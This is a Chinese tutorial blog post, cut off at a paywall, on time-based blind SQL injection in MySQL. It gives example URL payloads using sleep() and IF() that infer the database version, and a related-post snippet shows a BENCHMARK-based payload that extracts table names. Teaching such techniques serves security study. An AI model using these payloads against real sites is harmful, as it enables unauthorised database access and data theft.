【漏洞挖掘】——103、Blind注入类型深入刨析(中)

于 2024-06-21 14:54:12 发布
阅读量351 收藏
点赞数 17
分类专栏: 【WEB渗透】 文章标签: 盲注 SQL注入 Sleep注入 web安全 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/139859857
版权
【WEB渗透】 专栏收录该内容
103 篇文章 1 订阅 ¥29.90 ¥99.00
订阅专栏
时间盲注
使用场景

没有True/False,也没有任何错误提示类信息,在这种情况下可以考虑通过时间线的长短来判断是否存在SQL注入,即基于时间的盲注!

函数简介
  • sleep():用于延迟
  • IF(Condition,A,B):当Condition为TRUE时,返回A;当Condition为FALSE时,返回B
  • BENCHMARK(count,expr):重复count次执行表达式expr,它可以用于计时MySQL处理表达式有多快,结果值总是0
盲注流程

首先我们需要猜解后台的SQL语句的画像究竟如何之后便于我们构造SQL语句,例如:究竟是字符型还是数字型,还是使用了括号、双引号

猜解数据库版本信息

版本号第一位:

http://www.example.com/?id=1 and if(left(version(),1)>4,1,sleep(5)) --+    #没有任何延时

http://www.example.com/?id=1 and if(left(version(),1)>5,1,sleep(5)) --+    #延时5s

http://www.example.com/?id=1 and if(left(version(),1)=5,1,sleep(5)) --+    #没有任何延时

版本号第二位:

http://www.example.com/?id=1 and if(left(version(),3)>5.4,1,sleep(5)) --+    #没有任何延时

http://www.example.com

了解本专栏 订阅专栏 解锁全文
FLy_鹏程万里
关注
  • 17
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞挖掘】——102、Blind注入类型深入刨析(上)
Fly_鹏程万里
06-21 141
基于布尔的盲注基于时间的盲注
漏洞挖掘】——104、Blind注入类型深入刨析(下)
最新发布
Fly_鹏程万里
06-21 14
id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',1,(select benchmark(10000000,md5(0x41)))) --+ #没有延时。
漏洞挖掘】——24、XXE漏洞挖掘刨析(下)
Fly_鹏程万里
03-05 626
从服务器文件系统检索任意文件的XXE注入攻击需要以两种方式修改提交的XML引入DOCTYPE元素,该元素定义包含文件路径的外部实体编辑应用程序响应返回的XML的数据值以利用已定义的外部实体例如:假设一个购物应用程序通过向服务器提交以下XML来检查产品的库存水平上述XXE有效载荷定义了一个外部实体&XXE;...
漏洞挖掘——实验11 侧信道攻击+TCP/IP实验
一半西瓜的博客
04-17 5407
题目 Lab 侧信道攻击 + TCP/IP实验 Pre 1、用IE访问某些网站的时候,输入javascript:alert(document.cookie)会有什么反应,解释原因。 2、阅读下面两篇文章或者阅读一本书<<JavaScript DOM编程艺术>>: Javascript Tutorial https://www.evl.uic.edu/luc/bv...
sql注入详解
热门推荐
good good study
05-05 19万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
第十三章—手动漏洞挖掘(九)——SQLMAP自动注入(三)
weixin_43876557的博客
03-25 253
Sqlmap自动注入(三) 1.Optimization参数 Optimization——优化 #相当于把--predict-output、--keep-alive、--null-connection参数都加上了 -o #预设的输出。根据检测方法,对比返回值和统计表内容,不断缩小检测范围,提高检测效率,与--threads参数不兼容 #可以检测版本号、用户名、密码、privileges、role、数据库名称、表名、列名 #find / -name common-outputs.txt查看到统计表文件位置为
常见web漏洞——SQL注入
m0_55854679的博客
04-18 2560
pikachu漏洞练习平台(SQL—Inject) 概述 SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞: 1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入; 2.使用参数化(Parameterized Query 或 Parameterized Statem
Java代码审计漏洞挖掘(入门)
Ms08067安全实验室
11-10 4584
出品|MS08067实验室(www.ms08067.com)双十一最有意义的事情莫过于是学习一门高级渗透技术了!代码审计属于高级渗透测试服务的一环,顾名思义就是检查源代码安全缺陷,检查...
Oracle学习总结(6)—— SQL注入技术
科技D人生
09-23 2956
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行
PHP 小心urldecode引发的SQL注入漏洞
01-20
Ihipop 学校的 Discuz X1.5 论坛被黑,在那里吵了一个下午。... 粗略看了一下代码,这个 SQL 注入漏洞是 urldecode 函数造成的。在 PHP 手册,urldecode 函数下面有一个警告: The superglobals $_GET and $_REQ
Adaptive Filtering 4th),MATLAB——Blind_Adaptive_Filtering
01-12
经典beamforming、自适应滤波教材之matlab源代码。 Paulo S.R. Diniz编著的自适应滤波第四版(Adaptive filtering_Algorithms and Practical Implementation 4th),源代码——Blind_Adaptive_Filtering
Mysql-blind-inject.zip_Blind sql injection_SQL inject_blind_blin
09-24
SQL注入MYSQL数据库的盲注手法进行了一些简要的说明
手工盲注辅助注入工具Blind-SQL-Injector.zip
07-18
手工盲注辅助注入工具Blind-SQL-Injector.zip
blind.rar_Image watermarking_blind_watermarking blind
07-14
blind embbeding. is for image watermarking
【信息收集】——3、信息收集指南
Fly_鹏程万里
02-26 3万+
无意发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
【信息收集】——10、Zoomeye搜索语法
Fly_鹏程万里
02-28 2万+
无意发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 ZoomEye是一款针对网络空间的搜索引擎,收录了互联网空间的设备、网站及其使用的服务或组件等信息。 ZoomEye 拥有两大探测引擎:Xmap 和 Wmap,...
【信息收集】——8、FOFA搜索语法录
Fly_鹏程万里
04-12 2万+
无意发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 Kali Linux是一个集成了许许多多的渗透测试工具的一款系统,也可以说是专门问渗透测试人员量身打造的一般,本小节就为大家来介绍一下kali当有哪些用于信息收集...
漏洞挖掘】——25、XXE靶机实践测试
Fly_鹏程万里
03-08 8491
Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络的漏洞,我们希望你喜欢这个挑战!
python blind deconvolution算法实现
12-18
盲解卷积算法是一种用于恢复图像或信号的算法,它可以在未知的退化模型下还原原始的清晰图像或信号。在Python,可以使用各种库和工具来实现盲解卷积算法,包括NumPy、SciPy和OpenCV等。 首先,我们可以使用NumPy库来加载并处理图像数据。然后,可以使用SciPy库的信号处理模块来实现盲解卷积算法。这个模块包含了一些函数,例如convolve2d和fftconvolve,可以实现图像的卷积运算和傅里叶变换。这些函数可以帮助我们恢复出原始的清晰图像或信号。 另外,还可以使用OpenCV库来实现盲解卷积算法。OpenCV提供了各种图像处理和计算机视觉的工具,包括卷积运算、傅里叶变换以及图像恢复等功能。通过使用这些工具,我们可以很方便地实现盲解卷积算法。 在实现盲解卷积算法时,我们需要先对图像进行模糊处理,并添加一些噪声,以模拟实际场景的图像退化过程。然后,通过使用盲解卷积算法,我们可以尝试恢复出原始的清晰图像或信号。在这个过程,我们可以调整一些参数,例如正则化参数和迭代次数,以获得更好的恢复效果。 总的来说,Python可以使用各种库和工具来实现盲解卷积算法,包括NumPy、SciPy和OpenCV等。通过这些工具,我们可以很方便地对图像进行盲解卷积处理,以恢复出原始的清晰图像或信号。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值